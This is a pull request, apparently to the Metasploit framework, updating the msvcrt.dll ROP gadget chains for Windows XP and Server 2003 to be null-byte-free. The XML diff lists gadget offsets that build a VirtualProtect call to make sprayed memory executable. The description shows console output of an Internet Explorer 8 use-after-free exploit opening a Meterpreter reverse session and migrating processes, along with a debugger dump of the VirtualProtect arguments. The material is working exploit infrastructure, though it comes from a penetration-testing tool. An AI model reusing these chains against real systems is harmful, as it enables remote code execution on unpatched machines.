### PR TITLE
Update msvcrt.dll ROP chains for XP & Win2k3

### DIFF
--- a/data/ropdb/msvcrt.xml
+++ b/data/ropdb/msvcrt.xml
@@ -42,23 +42,29 @@
 	</compatibility>
 
 	<gadgets base="0x77ba0000">
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-		<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget offset="0x00001114">VirtualProtect()</gadget>
 		<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
-		<gadget value="junk">Filler</gadget>
+		<gadget value="junk">JUNK</gadget>
 		<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
-		<gadget offset="0x00026320">POP EBP # RETN</gadget>
-		<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
-		<gadget offset="0x000385b7">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
-		<gadget offset="0x000330fb">POP ECX # RETN</gadget>
-		<gadget offset="0x0004ff56">Writable location</gadget>
-		<gadget offset="0x00038a92">POP EDI # RETN</gadget>
-		<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
-		<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
-		<gadget value="nop">nop</gadget>
+		<gadget offset="0x00029801">POP EBP # RETN</gadget>
+		<gadget offset="0x00042265">ptr to 'push esp #  ret'</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0990F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
+		<gadget offset="0x000148d3">POP EBX, RET</gadget>
+		<gadget offset="0x000521e0">.data</gadget>
+		<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
+		<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
+		<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
+		<gadget offset="0x00038c04">POP EDI # RETN</gadget>
+		<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="0x03C0944F">EAX</gadget>
+		<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
+		<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
+		<gadget offset="0x00012563">POP EAX # RETN</gadget>
+		<gadget value="nop">NOP</gadget>
 		<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
 	</gadgets>
 </rop>

--- a/data/ropdb/msvcrt.xml
+++ b/data/ropdb/msvcrt.xml
@@ -7,12 +7,21 @@
 	</compatibility>
 
 	<gadgets base="0x77c10000">
+		<gadget offset="0x0002b860">POP EAX # RETN</gadget>
+		<gadget value="0xFFFFFBFF">0xFFFFFBFF -> ebx</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x0001362c">POP EBX # RETN</gadget>
+		<gadget offset="0x0004d9bb">Writable location</gadget>
+		<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
+		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
+		<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
+		<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
+		<gadget value="junk">JUNK</gadget>
+		<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
 		<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
 		<gadget offset="0x0002ee15">skip 4 bytes</gadget>
-		<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
-		<gadget value="0x00000400">0x00000400-> ebx</gadget>
-		<gadget offset="0x00040d13">POP EDX # RETN</gadget>
-		<gadget value="0x00000040">0x00000040-> edx</gadget>
 		<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
 		<gadget offset="0x0004d9bb">Writable location</gadget>
 		<gadget offset="0x0001a88c">POP EDI # RETN</gadget>


### PR DESCRIPTION
This updates the msvcrt.dll ROP chain for Win XP and Win2k3. They reason an update is needed is because often property-based sprays do not allow null bytes, as a result of that we often have to use a different set of null-byte-free ROPs to write the exploit.

The XP ROP is pretty easy to test since many browser exploits use this. For example, the following is a demo of ie_execcommand_uaf using the updated msvcrt ROP against IE8 on Win XP SP3:

```
msf exploit(ie_execcommand_uaf) > [*] 10.0.1.5         ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
[*] 10.0.1.5         ie_execcommand_uaf - Redirecting to gsiza.html
[*] 10.0.1.5         ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
[*] 10.0.1.5         ie_execcommand_uaf - Loading gsiza.html
[*] 10.0.1.5         ie_execcommand_uaf - Using msvcrt ROP
[*] 10.0.1.5         ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
[*] 10.0.1.5         ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
[*] 10.0.1.5         ie_execcommand_uaf - Loading svFHNg.html
[*] 10.0.1.5         ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
[*] Sending stage (770048 bytes) to 10.0.1.5
[*] Meterpreter session 1 opened (10.0.1.76:4444 -> 10.0.1.5:4192) at 2013-10-01 16:23:28 -0500
[*] Session ID 1 (10.0.1.76:4444 -> 10.0.1.5:4192) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1616)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1388
[+] Successfully migrated to process
```

Proof that ie_execcommand_uaf uses the msvcrt ROP from RopDB:
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_execcommand_uaf.rb#L141

For Windows Server 2003, I don't really have a vuln box to test a similar scenario.  So I ended up using the same approach similar to PR #2442.  If you're using the same manual approach, at Kernel32!VirtualProtect after ROP, you should see the arguments like this (captured in Win2k3):

```
02170054   FFFFFFFF  ÿÿÿÿ  |hProcess = FFFFFFFF
02170058   02170084  „.  |Address = 02170084
0217005C   00000500  ...  |Size = 500 (1280.)
02170060   00000040  @...  |NewProtect = PAGE_EXECUTE_READWRITE
02170064   77BEF001  ð¾w  \pOldProtect = msvcrt.77BEF001
```

Also, the Win2k3 ROP chain is based on Corelan's:
https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2
